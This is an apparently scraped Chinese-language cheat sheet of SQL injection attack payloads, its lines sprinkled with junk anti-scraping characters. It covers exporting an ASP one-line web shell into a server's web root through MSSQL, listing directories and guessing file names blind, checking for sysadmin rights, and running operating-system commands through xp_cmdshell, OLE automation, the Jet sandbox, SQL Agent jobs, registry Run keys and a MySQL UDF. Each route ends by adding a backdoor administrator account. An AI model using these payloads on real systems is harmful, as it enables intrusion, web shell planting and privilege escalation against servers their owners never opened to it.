MSSQL语句导出一句话木马5 P2 z: {) E& g) u
首先确定网站的WEB路径' I8 K) f* ^& i5 r/ T
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马' Q8 s# E8 `3 f
i4 f6 _- H% E3 P; [# c5 P( {
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
1 k# ]. `2 t" w//将一句话木马插入表中( Y |* J! [: ~; o6 ^3 b
. a# D0 _( G3 L;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 0 @, C( L( ^$ E8 {8 ~' n7 l
//导出一个ASP文件
. `/ i. b. {0 q9 F% D4 `" u1 y3 g! B. n; Y
- z! i- w5 W: _$ j) ^
关于MSSQL列目录
5 \% o# O- b, P8 P# a/ I" x;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表- I6 z7 G3 u3 y5 C- l' v# Z$ y& |2 ?
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表: k! e8 K3 o* e$ i
% I* v8 b/ r# E1 Mand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
7 V3 B. ^; Y6 O2 M- E" i7 f8 R* A9 q5 `$ [) y% E+ l
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
% N) \ J! G. h! [/ `) {6 i2 G6 C+ Z: a2 v8 R9 {4 W! S5 Z
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
: i- u+ K2 E9 G$ ~1 P+ Z$ q( T# [ f6 D g+ |- s2 @+ E
% t5 l4 h1 B; e' M6 j
数据库版本和权限查看
1 Y! q( H/ ^; P) W# F8 `and 1=(select @@VERSION) //查看详细的数据库信息.
% L8 ~6 b' W6 r- c& @and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
; V/ X& \0 N/ L' p( `+ D/ Rand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
7 [" D+ L; W, I0 A1 j j' x+ U
( y3 o/ C% w% D: H0 t$ b, Q4 y* b$ \ t& v* Z& r
1.利用xp_cmdshell执行命令; W" K* y6 N7 j" N% [+ Y5 f7 F
exec master..xp_cmdshell 'net user rfire 123456 /add' X: H/ j& Y6 Z! m) `" w
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
! d% q. [1 Z1 d1 T7 E" a
$ g Y- s$ E. c恢复xp_cmdshell存储过程
5 e% ?# m. a, L' v4 C2 TExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 K4 `* O5 {$ b* E \6 M$ k( w. ~4 y
; M5 o* b3 T4 \1 H) S8 e) _8 O
. B9 L! R5 c6 o3 m2.利用SP_OAcreate和SP_OAMETHOD执行命令
6 S* Z' K" |" {! W在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
: D, S0 _* `9 ? ]) I2 a3 GDECLARE @shell INT //建立一个@shell实体8 v3 D2 W( F u4 ?5 Q: j. }
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例: i1 Q/ ]. }9 c
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例2 r/ y8 Y& b5 K7 y$ u
4 e5 D; f) @7 r$ r
3 G. Z6 A5 y0 g* e( k! Y0 |
3.利用沙盒模式# v3 [: F ~% I b# r, b7 M5 L% G
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。7 I* A: X9 |1 V7 C5 c
开启沙盒模式:) d" U& P, r! g) @
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',01 h% o1 u2 @! M1 e* I7 v) p3 M# H
& J$ N% g% b' c5 k执行命令:
/ K( h4 k) _$ XSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');; R! D9 A; T" v" r/ V4 i/ g$ ?
9 c- f/ J1 U: B' r- E ?
& c w8 l! Q- U% b8 P! e7 H' |4.利用SQL代理执行命令
% L |5 |7 I3 Z1 {! b8 B) GEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
2 F6 n1 Y9 I- @4 `7 A1 u2 p1 ]
$ \. q; T0 y1 X0 F2 C执行命令:
! t9 v6 x Q- M7 N, e8 [/ }, b; ^use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
- d; Z0 `& S3 U$ N7 lexec sp_add_job 'x'6 q+ m, k/ y( u2 w
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
$ Q z, h! f5 z8 W8 K" g$ fexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业) _" \" Y7 g( c4 K$ W
8 ?1 I; ]3 V. I! s
2 R8 y; R5 f! s% K& V6 l$ H5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)# \, A" @ }) y5 {9 P# b
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'* s. p* _0 f% A! O$ J
$ _+ r9 a1 l. |# J1 v9 s7 F* v/ ` [: w0 |8 ?8 Y
6.MYSQL的命令执行9 o( | Z9 t7 F: c+ C
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)8 i6 J$ z% i1 I0 c3 V+ a9 _8 x
首先要在su.php下导出c:\windows\udf.dll' D+ U* e, u; n' c
导出后执行创建自定义函数命令:1 k- L5 Z8 g9 I6 P
Create Function cmdshell returns string soname 'udf.dll'
* U0 r* e7 a0 `: v执行命令2 ~) l% R$ S# O0 V7 M+ c% I6 @
select cmdshell('net user rfire 123456 /add')
f+ v+ I$ _# p! J+ Q$ y/ @) l执行后删除函数 drop function cmdshell9 u: O! p1 [2 n$ [
|